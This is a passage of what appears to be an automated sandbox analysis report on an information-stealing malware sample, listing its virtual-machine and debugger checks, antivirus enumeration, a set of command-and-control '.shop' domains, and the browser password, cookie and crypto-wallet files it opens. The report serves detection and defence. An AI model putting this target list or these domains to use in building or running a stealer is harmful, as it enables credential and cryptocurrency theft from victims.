            Source: VoGtelkHSn.exe, 00000000.00000003.2058264615.000000000546E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696428655
            Source: VoGtelkHSn.exe, 00000000.00000003.2058264615.000000000546E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
            Source: VoGtelkHSn.exe, 00000000.00000003.2058143857.00000000054E4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: YNVMware
            Source: Amcache.hve.4.drBinary or memory string: VMware20,1
            Source: Amcache.hve.4.drBinary or memory string: Microsoft Hyper-V Generation Counter
            Source: Amcache.hve.4.drBinary or memory string: NECVMWar VMware SATA CD00
            Source: Amcache.hve.4.drBinary or memory string: VMware Virtual disk SCSI Disk Device
            Source: VoGtelkHSn.exe, 00000000.00000003.2058264615.000000000546E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696428655]
            Source: Amcache.hve.4.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
            Source: Amcache.hve.4.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
            Source: Amcache.hve.4.drBinary or memory string: VMware PCI VMCI Bus Device
            Source: Amcache.hve.4.drBinary or memory string: VMware VMCI Bus Device
            Source: Amcache.hve.4.drBinary or memory string: VMware Virtual RAM
            Source: Amcache.hve.4.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
            Source: VoGtelkHSn.exe, 00000000.00000003.2058264615.000000000546E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696428655x
            Source: VoGtelkHSn.exe, 00000000.00000003.2058264615.000000000546E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696428655
            Source: Amcache.hve.4.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
            Source: VoGtelkHSn.exe, 00000000.00000003.2058264615.000000000546E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
            Source: Amcache.hve.4.drBinary or memory string: VMware Virtual USB Mouse
            Source: Amcache.hve.4.drBinary or memory string: vmci.syshbin
            Source: Amcache.hve.4.drBinary or memory string: VMware, Inc.
            Source: VoGtelkHSn.exe, 00000000.00000003.2058264615.000000000546E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696428655f
            Source: Amcache.hve.4.drBinary or memory string: VMware20,1hbin@
            Source: Amcache.hve.4.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
            Source: Amcache.hve.4.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
            Source: VoGtelkHSn.exe, 00000000.00000003.2058264615.000000000546E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655}
            Source: Amcache.hve.4.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
            Source: VoGtelkHSn.exe, 00000000.00000003.2058264615.000000000546E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
            Source: VoGtelkHSn.exe, 00000000.00000003.2058264615.000000000546E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
            Source: VoGtelkHSn.exe, 00000000.00000003.2058264615.000000000546E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
            Source: VoGtelkHSn.exe, 00000000.00000003.2058264615.000000000546E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696428655}
            Source: Amcache.hve.4.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
            Source: VoGtelkHSn.exe, 00000000.00000003.2058264615.000000000546E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
            Source: VoGtelkHSn.exe, 00000000.00000003.2058264615.000000000546E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696428655t
            Source: VoGtelkHSn.exe, 00000000.00000003.2058264615.000000000546E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696428655x
            Source: Amcache.hve.4.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
            Source: VoGtelkHSn.exe, 00000000.00000003.2058264615.000000000546E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655
            Source: VoGtelkHSn.exe, 00000000.00000003.2058264615.000000000546E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696428655s
            Source: VoGtelkHSn.exe, 00000000.00000003.2058264615.000000000546E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
            Source: VoGtelkHSn.exe, 00000000.00000003.2058264615.000000000546E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696428655
            Source: Amcache.hve.4.drBinary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
            Source: Amcache.hve.4.drBinary or memory string: vmci.syshbin`
            Source: VoGtelkHSn.exe, 00000000.00000003.2058264615.000000000546E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
            Source: Amcache.hve.4.drBinary or memory string: \driver\vmci,\driver\pci
            Source: VoGtelkHSn.exe, 00000000.00000003.2058264615.000000000546E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696428655j
            Source: Amcache.hve.4.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
            Source: VoGtelkHSn.exe, 00000000.00000003.2058264615.000000000546E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696428655
            Source: Amcache.hve.4.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
            Source: VoGtelkHSn.exe, 00000000.00000003.2058264615.000000000546E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696428655h
            Source: C:\Users\user\Desktop\VoGtelkHSn.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Users\user\Desktop\VoGtelkHSn.exeProcess queried: DebugPortJump to behavior
            Source: C:\Users\user\Desktop\VoGtelkHSn.exeProcess queried: DebugPortJump to behavior
            Source: C:\Users\user\Desktop\VoGtelkHSn.exeCode function: 0_2_00433CC0 LdrInitializeThunk,0_2_00433CC0
            Source: C:\Users\user\Desktop\VoGtelkHSn.exeCode function: 0_2_02BF7A5B push dword ptr fs:[00000030h]0_2_02BF7A5B
            Source: C:\Users\user\Desktop\VoGtelkHSn.exeCode function: 0_2_02EB092B mov eax, dword ptr fs:[00000030h]0_2_02EB092B
            Source: C:\Users\user\Desktop\VoGtelkHSn.exeCode function: 0_2_02EB0D90 mov eax, dword ptr fs:[00000030h]0_2_02EB0D90

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Source: VoGtelkHSn.exeString found in binary or memory: tolerateilusidjukl.shop
            Source: VoGtelkHSn.exeString found in binary or memory: productivelookewr.shop
            Source: VoGtelkHSn.exeString found in binary or memory: strollheavengwu.shop
            Source: VoGtelkHSn.exeString found in binary or memory: demonstationfukewko.shop
            Source: VoGtelkHSn.exeString found in binary or memory: liabilitynighstjsko.shop
            Source: VoGtelkHSn.exeString found in binary or memory: alcojoldwograpciw.shop
            Source: VoGtelkHSn.exeString found in binary or memory: incredibleextedwj.shop
            Source: VoGtelkHSn.exeString found in binary or memory: shortsvelventysjo.shop
            Source: VoGtelkHSn.exeString found in binary or memory: shatterbreathepsw.shop
            Source: C:\Users\user\Desktop\VoGtelkHSn.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\VoGtelkHSn.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\VoGtelkHSn.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\VoGtelkHSn.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\VoGtelkHSn.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\VoGtelkHSn.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\VoGtelkHSn.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\VoGtelkHSn.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
            Source: Amcache.hve.4.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
            Source: Amcache.hve.4.drBinary or memory string: msmpeng.exe
            Source: Amcache.hve.4.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
            Source: VoGtelkHSn.exe, 00000000.00000003.2104950559.0000000002CCC000.00000004.00000020.00020000.00000000.sdmp, VoGtelkHSn.exe, 00000000.00000002.2299084097.0000000005440000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
            Source: Amcache.hve.4.drBinary or memory string: MsMpEng.exe
            Source: C:\Users\user\Desktop\VoGtelkHSn.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

            Stealing of Sensitive Information

            barindex
            Source: Yara matchFile source: Process Memory Space: VoGtelkHSn.exe PID: 5444, type: MEMORYSTR
            Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
            Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
            Source: VoGtelkHSn.exe, 00000000.00000002.2298240964.0000000002C5C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\Electrum\wallets
            Source: VoGtelkHSn.exe, 00000000.00000003.2134203398.0000000002CBB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\com.liberty.jaxx\IndexedDB
            Source: VoGtelkHSn.exe, 00000000.00000002.2298240964.0000000002C5C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: window-state.json
            Source: VoGtelkHSn.exe, 00000000.00000002.2298240964.0000000002C5C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\Exodus\exodus.wallet
            Source: VoGtelkHSn.exe, 00000000.00000003.2134203398.0000000002CBB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ExodusWeb3
            Source: VoGtelkHSn.exe, 00000000.00000002.2298240964.0000000002C5C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\Ethereum
            Source: VoGtelkHSn.exe, 00000000.00000003.2134203398.0000000002CBB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
            Source: VoGtelkHSn.exe, 00000000.00000003.2057403228.0000000002C56000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: keystore
            Source: C:\Users\user\Desktop\VoGtelkHSn.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
            Source: C:\Users\user\Desktop\VoGtelkHSn.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
            Source: C:\Users\user\Desktop\VoGtelkHSn.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
            Source: C:\Users\user\Desktop\VoGtelkHSn.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cert9.dbJump to behavior
            Source: C:\Users\user\Desktop\VoGtelkHSn.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
            Source: C:\Users\user\Desktop\VoGtelkHSn.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
            Source: C:\Users\user\Desktop\VoGtelkHSn.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
            Source: C:\Users\user\Desktop\VoGtelkHSn.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
            Source: C:\Users\user\Desktop\VoGtelkHSn.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
            Source: C:\Users\user\Desktop\VoGtelkHSn.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
            Source: C:\Users\user\Desktop\VoGtelkHSn.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
            Source: C:\Users\user\Desktop\VoGtelkHSn.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
            Source: C:\Users\user\Desktop\VoGtelkHSn.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
            Source: C:\Users\user\Desktop\VoGtelkHSn.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
            Source: C:\Users\user\Desktop\VoGtelkHSn.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
            Source: C:\Users\user\Desktop\VoGtelkHSn.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
            Source: C:\Users\user\Desktop\VoGtelkHSn.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
            Source: C:\Users\user\Desktop\VoGtelkHSn.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqliteJump to behavior
            Source: C:\Users\user\Desktop\VoGtelkHSn.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
            Source: C:\Users\user\Desktop\VoGtelkHSn.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
            Source: C:\Users\user\Desktop\VoGtelkHSn.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
            Source: C:\Users\user\Desktop\VoGtelkHSn.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
            Source: C:\Users\user\Desktop\VoGtelkHSn.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
            Source: C:\Users\user\Desktop\VoGtelkHSn.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
            Source: C:\Users\user\Desktop\VoGtelkHSn.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Users\user\Desktop\VoGtelkHSn.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
            Source: C:\Users\user\Desktop\VoGtelkHSn.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
            Source: C:\Users\user\Desktop\VoGtelkHSn.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
            Source: C:\Users\user\Desktop\VoGtelkHSn.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
            Source: C:\Users\user\Desktop\VoGtelkHSn.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
            Source: C:\Users\user\Desktop\VoGtelkHSn.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
            Source: C:\Users\user\Desktop\VoGtelkHSn.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\formhistory.sqliteJump to behavior
            Source: C:\Users\user\Desktop\VoGtelkHSn.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
            Source: C:\Users\user\Desktop\VoGtelkHSn.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Users\user\Desktop\VoGtelkHSn.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
            Source: C:\Users\user\Desktop\VoGtelkHSn.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
            Source: C:\Users\user\Desktop\VoGtelkHSn.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
            Source: C:\Users\user\Desktop\VoGtelkHSn.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
            Source: C:\Users\user\Desktop\VoGtelkHSn.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
            Source: C:\Users\user\Desktop\VoGtelkHSn.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Users\user\Desktop\VoGtelkHSn.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
            Source: C:\Users\user\Desktop\VoGtelkHSn.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
            Source: C:\Users\user\Desktop\VoGtelkHSn.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
            Source: C:\Users\user\Desktop\VoGtelkHSn.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
            Source: C:\Users\user\Desktop\VoGtelkHSn.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
            Source: C:\Users\user\Desktop\VoGtelkHSn.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
            Source: C:\Users\user\Desktop\VoGtelkHSn.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
            Source: C:\Users\user\Desktop\VoGtelkHSn.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
            Source: C:\Users\user\Desktop\VoGtelkHSn.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
            Source: C:\Users\user\Desktop\VoGtelkHSn.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
            Source: C:\Users\user\Desktop\VoGtelkHSn.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
            Source: C:\Users\user\Desktop\VoGtelkHSn.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
            Source: C:\Users\user\Desktop\VoGtelkHSn.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
            Source: C:\Users\user\Desktop\VoGtelkHSn.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Users\user\Desktop\VoGtelkHSn.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
            Source: C:\Users\user\Desktop\VoGtelkHSn.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
            Source: C:\Users\user\Desktop\VoGtelkHSn.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
            Source: C:\Users\user\Desktop\VoGtelkHSn.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
            Source: C:\Users\user\Desktop\VoGtelkHSn.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
            Source: C:\Users\user\Desktop\VoGtelkHSn.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
            Source: C:\Users\user\Desktop\VoGtelkHSn.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
            Source: C:\Users\user\Desktop\VoGtelkHSn.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
            Source: C:\Users\user\Desktop\VoGtelkHSn.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
            Source: C:\Users\user\Desktop\VoGtelkHSn.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
            Source: C:\Users\user\Desktop\VoGtelkHSn.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
            Source: C:\Users\user\Desktop\VoGtelkHSn.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
            Source: C:\Users\user\Desktop\VoGtelkHSn.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\prefs.jsJump to behavior
            Source: C:\Users\user\Desktop\VoGtelkHSn.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
            Source: C:\Users\user\Desktop\VoGtelkHSn.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
            Source: C:\Users\user\Desktop\VoGtelkHSn.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
            Source: C:\Users\user\Desktop\VoGtelkHSn.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
            Source: C:\Users\user\Desktop\VoGtelkHSn.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
            Source: C:\Users\user\Desktop\VoGtelkHSn.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
            Source: C:\Users\user\Desktop\VoGtelkHSn.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
            Source: C:\Users\user\Desktop\VoGtelkHSn.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
            Source: C:\Users\user\Desktop\VoGtelkHSn.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
            Source: C:\Users\user\Desktop\VoGtelkHSn.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
            Source: C:\Users\user\Desktop\VoGtelkHSn.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
            Source: C:\Users\user\Desktop\VoGtelkHSn.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\logins.jsonJump to behavior
            Source: C:\Users\user\Desktop\VoGtelkHSn.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
            Source: C:\Users\user\Desktop\VoGtelkHSn.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
            Source: C:\Users\user\Desktop\VoGtelkHSn.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
            Source: C:\Users\user\Desktop\VoGtelkHSn.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
            Source: C:\Users\user\Desktop\VoGtelkHSn.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
            Source: C:\Users\user\Desktop\VoGtelkHSn.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
            Source: C:\Users\user\Desktop\VoGtelkHSn.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
            Source: C:\Users\user\Desktop\VoGtelkHSn.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
            Source: C:\Users\user\Desktop\VoGtelkHSn.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
            Source: C:\Users\user\Desktop\VoGtelkHSn.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
            Source: C:\Users\user\Desktop\VoGtelkHSn.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
